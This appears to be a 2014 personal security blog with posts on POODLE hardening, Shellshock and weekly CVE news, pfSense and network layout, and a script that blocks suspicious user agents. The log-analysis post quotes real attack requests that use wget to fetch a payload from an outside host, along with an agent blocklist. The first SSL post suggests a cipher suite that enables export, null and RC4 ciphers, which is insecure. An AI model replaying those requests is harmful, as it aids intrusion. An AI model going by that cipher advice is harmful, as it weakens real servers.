Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 1 Jahr

Dienstag, 14. Oktober 2014

SSL issue again? [UPDATE 2]

Today The register announced that there will be an new thread against SSL soon.
According to the source there are currently only rumours going on and the only information is that it will be a threat to SSL v3.

So maybe its just time to get prepared to whatever will comes the way.

What I have done on my server:
    1. I checked details about my current SSL usage via https://www.ssllabs.com/ssltest/analyze.html?d=<SERVERNAME>
    2. As there has been some minus points within the check I just created a new cert using 2048 bit and SHA 256
    3. I adjusted some settings in my apache config

  • SSLProtocol +TLSv1 +TLSv1.1 +TLSv1.2
  • SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+EXP:+eNULL

    So I disabled SSL currently, forcing only TLS, this uses the same library while only some "handshake" informations changes, maybe this brings some extra time. 

    So lets find out what the night brings.

    [UPDATE 2014/10/15]
    The issue is announced.

    http://www.thedomains.com/2014/10/14/google-discloses-a-vulnerability-in-ssl-3-0/

    http://www.theregister.co.uk/2014/10/14/google_drops_ssl_30_poodle_vulnerability/

    I haven't seen a Proof of Concept yet. But as it seems it is just a fallback issue. So you can force the SSL/TLS Version to a vulnerable (or less secure) version. For example SSLv3 which now has an issue that an attacker can calculate the plaintext of the secure connection.

    So the ideas yesterday (see above) are still right.


    [UPDATE 2014/10/16]
    Just for the record:

    A great overview on all changes you can do to protect yourself:

    https://scotthelme.co.uk/sslv3-goes-to-the-dogs-poodle-kills-off-protocol/

    And as an update to my ideas above, you may should set your Ciphersuite to:

    SSLCipherSuite EECDH+AES:EDH+AES:-SHA1:EECDH+RC4:EDH+RC4:RC4-SHA:EECDH+AES256:DHE+AES256:AES256-SHA:!aNULL:!eNULL:!EXP:!LOW:!MD5

    Than it will support "Forward Secrecy" at least for some browsers

    Montag, 13. Oktober 2014

    This week in security Week 40/41

    Some issues/news this week:


    CVE-2014-2044 Incomplete blacklist vulnerability in ajax/upload.php in ownCloud before 5.0, when running on Windows, allows remote authenticated users to bypass intended access restrictions, upload files with arbitrary names, and execute arbitrary code via an Alternate Data Stream (ADS) syntax in the filename parameter, as demonstrated using .htaccess::$DATA to upload a PHP program.

    How to Bypass Two-Factor Authentication (2FA) and What the Future Holds If Two-Factor Authentication (2FA) Is Not Bulletproof, How Will We Authenticate? In the past couple of years, we have repeatedly been reminded of the weakness of passwords as an authentication method. High-profile breaches with millions of lost credentials, sophisticated desktop malware, advanced mobile malware, phishing scams and other attacks have proven time and time again that a username and password combination cannot provide the adequate evidence required for authentication.

    CVE-2014-1572 A critical zero-day vulnerability discovered in Mozilla’s popular Bugzilla bug-tracking software used by hundreds of prominent software organizations, both private and open-source, could expose sensitive information and vulnerabilities of the software projects to the hackers.


    Sonntag, 5. Oktober 2014

    Analyzing Apache Logs [Introducing myPyApacheFW]

    There will be no news this weekend.
    Last week I did a lot of research regarding Apache and in special Agent information.

    I run my own installation of owncloud on one of my virtual servers. When you take a look at the access log, you may find something like:

    oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
    oc.johest.de:80 107.15.13.138 - - [05/Oct/2014:14:46:37 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
    oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
    oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
    oc.johest.de:443 54.187.189.195 - - [08/Jul/2014:19:08:57 +0200] "GET /admin/config.php HTTP/1.0" 403 9273 "-" "Python-urllib/1.17"
    oc.johest.de:443 114.112.100.51 - - [13/Jul/2014:00:09:39 +0200] "GET /admin/config.php HTTP/1.0" 403 9225 "-" "Python-urllib/1.17"
     oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:07:09:53 +0200] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 630 "-" "chroot-apach0day"
    oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:20:32:12 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 636 "-" "chroot-apach0day"
    oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:23:45:21 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 642 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"


    As you can easily see, such a access is not really what you want, There is no need that a mail-server connects to my web-space and I really don't think that i provide a rmUnblock.cgi. Even any connection via Python or curl and Wget seems to be a bit strange.
    On a different machine i saw some huge brute-force attacks using Wget.

    So what can you do.
    First i took a look at all the agent information i have found in my own log files.
    It was obvoius that some agents should not be there, so i made a list of them

    • wget
    • curl
    • python
    • sqlmap
    • -
    • apache0day
    last one is a not available header, so someone who accessed your page and was not showing the agent information. 
    Than i created my own little tool.

    MyPyApacheFW

    First of all, if it comes down to apache hardening, there are several things you should do, and most of the things will secure your web-service more than my script currently can. So please, if you want to be sure just use
    1. mod_security
    2. mod_evasive
    3. fail2ban
    4. apparmor
    and anyway, give my script a try :-)

    My script is available on github:


    it simply takes an apache access log file as an input, and parses for any regmatch of bad agents and will block them via iptables.
    In the the newest version it does support GeoIP for logging also.

    So if you have cloned it to your local device, you can simply run
    cat /var/log/apache/access.log | python mypyfw.py
    and it will work. I will always try to have it backward compatible to the earliest version. So if there are new features they will not be running by defrault and will use extra options. Like:
    cat /var/log/apache/access.log | python mypyfw.py -g -t 
    Which will perform a logging only run, adding GeoIP information to the logfile.

    I added my first addon today, which is really just a few liner to cleanup iptables.
    You can find it within the Addon-folder.
    mypy-ipfw-cleanup.py
    will just go through every rule and delete them if the rule did not receive any package. As a bonus, it will reset the count for every rule to zero. So if you run it every day only active rules will stay on your system.
    Usage: mypyfw.py [options]
    
    Options:
      -h, --help            show this help message and exit
      -f FILE, --file=FILE  write report to FILE, default is /var/log/mypyfw.log
      -i IPPOSITION, --ippos=IPPOSITION
                            adjust IP position, default is 0
      -b FILE, --blacklist=FILE
                            path to blacklist, default values are Hardcoded
      -w FILE, --whitelist=FILE
                            path to Whitelist, default values are Hardcoded
      -t, --try-run          you want a test run
      -g, --geoIP           add GeoIP data to output





    Mittwoch, 1. Oktober 2014

    [Guide] Network layout

    the week started to be a silent one.

    A little guidance

    When it comes to network design, there are different architectures which are preferred. I would alway recommend to do a 2 Layer Setup. In this case two network components spread a DMZ for services.

    Now you are able to split the traffic. Normally you place any external service machines within the external network. Any backend machine within the internal network.

    Backend traffic now needs to go through the second network component Normally this machine would do basic (static) routing between networks and would have some basic firewall rules.

    In another step we might add some firewalls to these layout. Like ddos prevention systems next to our external router and am application firewall to the external network.

    The ddos protection should just protect our firewalls. So, if we compare ddos protection to  a firewall (like pfsense hardware firewall) we would be able to handle 8.000.000 packages as the firewall is stateful. Stateful means that every packages which goes through it is saved in an internal table. A ddos attack can easily reach more then this package count, so it would kill our firewall first. So dropping all ddos attacks in a first step does always lead to a solid system.
    Please keep in mind the the routing components which separates the networks already do basic firewalling. They should always deny traffic from outside to internal and the should really take care of the traffic, so for example no external service machine should be able to interact with every internal machine, the external machine should only communicate with there dedicated internal machines.

    The application firewall is just for service protection.
    We are able to filter xss attacks to http/https or do malware checking within the email traffic.


    Sonntag, 28. September 2014

    This week in security Week 39

    This is my review of the biggest security of last week. caused by a lot of trouble within the bash, there are only two topics this week.

    Mozilla will phase out SHA-1 certificates. As reported in a blog post caused by an increasing  amount of attacks against this 20 year old standard, Mozilla will drop the support for SHA-1 certificates . CAs and server operator should renew their certificated switching to a newer standard. The timeline shows that they will accept these certificates until 2017/01/01.

    A bash vulnerability was found. It was reported as CVE-2014-6271. Described in an very easy way, bash is currently vulnerable to code injections. As many services are using bash, for example the DHCP client, malicious servers might can inject code on the client server and execute it.
    When recalling the news this week, it seems that nothing was as important as this fraud to the bash. So lets get a bit in more detail. Many Proof Of Concepts has been published this week, what they all have in common is that you need to have an service using the bash and this service should be available from the external network.

    As taken from the bug description, here is the (first) list of possible frauds:
    • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn GNU Bash subshells, or on any system where the /bin/sh interface is implemented using GNU Bash.
    • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
    • Allow arbitrary commands to run on a DHCP client machine.

    So, whats bad in this case: If you use bash as a cgi language in your web-service you should fix this bug. If you use servers within a data-center and your provider assigns your ip address via DHCP you should fix your systems and talk to your provider.
    All in all it isn't easy to inject calls into your bash from an external network. Or at least it should not be a easy. So in all cases, updates are provided, fix your system. If unsure, maybe you are running an outdated version which will not receive any updates. Should down the service which you think is maybe influenced and test it.
    The IBM intrusion detection solution is using a mechanism to avoid shell injection since 7 years.










    Dienstag, 23. September 2014

    [Tool] pfsense, the all-in-one firewall

    Whatever we learned from the big company's in network infrastructure, there is one thing Juniper and Cisco have in common. Both bank on FreeBSD.

    So there is another firewall system which does so, pfsense.

    The pfSense® project is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. The pfSense project has become a fairly popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a single computer to large corporations, universities and other organizations protecting thousands of network devices.
    This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. We also offer an embedded image for Compact Flash based installations. The two projects have since diverged significantly.
    We've steadily grown to become one of the most widely used network firewalls in the world, with in excess of 200,000 known live installs as of December 2013.

     In the usual case you just download a live installer from their website. Both i386 and amd54 architectures are supported. The basic installation is quite easy handled.
    After the reboot you need to choose

    • WAN interface: The Wide Area Network interface, your external connection
    • LAN Interface: The Local Area Network interface, your internal connection
    In nowadays design cases, the firewall is placed between the external and internal networks. So any packet from external needs to go through the firewall first.

    pfsense has a huge packages database, as there are many features already included or they are easy to install and will be integrated in the webconfiguration toolbox. The following list should give an overview on all these components.
    • Suricata , High Performance Network IDS, IPS and Security Monitoring engine by OISF.
    • HAproxy , The Reliable, High Performance TCP/HTTP Load Balancer 
    • mailscanner , an e-mail security and anti-spam package for e-mail gateway systems.
    • a proxy including mod security, ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis. In addition this package allows URL forwarding which can be convenient for hosting multiple websites behind pfSense using 1 IP address.
    • squid including squidguard, High performance web proxy cache. It combines squid as a proxy server with it's capabilities of acting as a HTTP / HTTPS reverse proxy. It includes an Exchange-Web-Access (OWA) Assistant.
    and many many more.

    Pfsense is fully manageable via a web interface. When  both LAN and WAN are set, be careful, WAN access is blocked by default, so you will not be able to access the GUI or ssh from outside. So maybe you want to adjust your internal ips first.



    Sonntag, 21. September 2014

    This week in security Week 38

    Regarding security related news it was an endless week (again), the following are just some of the topics this week

    My recent news of the week:

    FreeBSD has finally closed a bug which was found within the TCP stack. The original bug was found back in 2004 CVE-2004-0230. The bug basically could led to a Denial-of-Service attack by injecting TCP-RST packages into the stream. RST packages are normally send as response to a none TCP connection, for example when the port rejects the connection. The issue is related to large windows sizes and log active connections, such as BGP. FreeBSD is the used OS underneath Cisco, Juniper and MacOS (for eample).

    APT the package management sytsem within Debian and Ubuntu closed a bug regarding the package verification. So basically, the reinstallation of a package does not verify the package again. So if an attacker would be able to infect the package within the cache/tmp directory these package could just be installed.

    As reported by some teams, during the last week was a huge income of chargen related attacks. Chargen is an Linux tool which listens on port 19 to tcp and udp packages. Chargen  replies to an request by sending between 0 and 512 random characters to a specified port. A manipulated udp packages could force chargen to send the data as udp package to any service on every server and could be part of a ddos attack. So i would recommend to blog all inbound udp traffic coming from port 19 on a central firewall.

     Spiderlabs the creator of the OWASP mod_security rules, reported about a new attack on their honeypots. In this case, the well known PHP CGI vulnerability is used to upload and install malware.

    There was a really good post on the RedHat security blog about the TLS Landscape now a days. In my opinion the key outcome of the post is that we really need to increase the SSL/TLS usage today. Currently only 40% of all web-servers support TLS by default. ;Maybe the Google idea, ranking with TLS higher than others will help in this case too.

    In the USA the do-it-ouself centers of Home Depot had an issue, and 56.000.000 credit card information's are lost. According to new information's, many employees informed the management already years ago that this information's aren't secured in the way it should.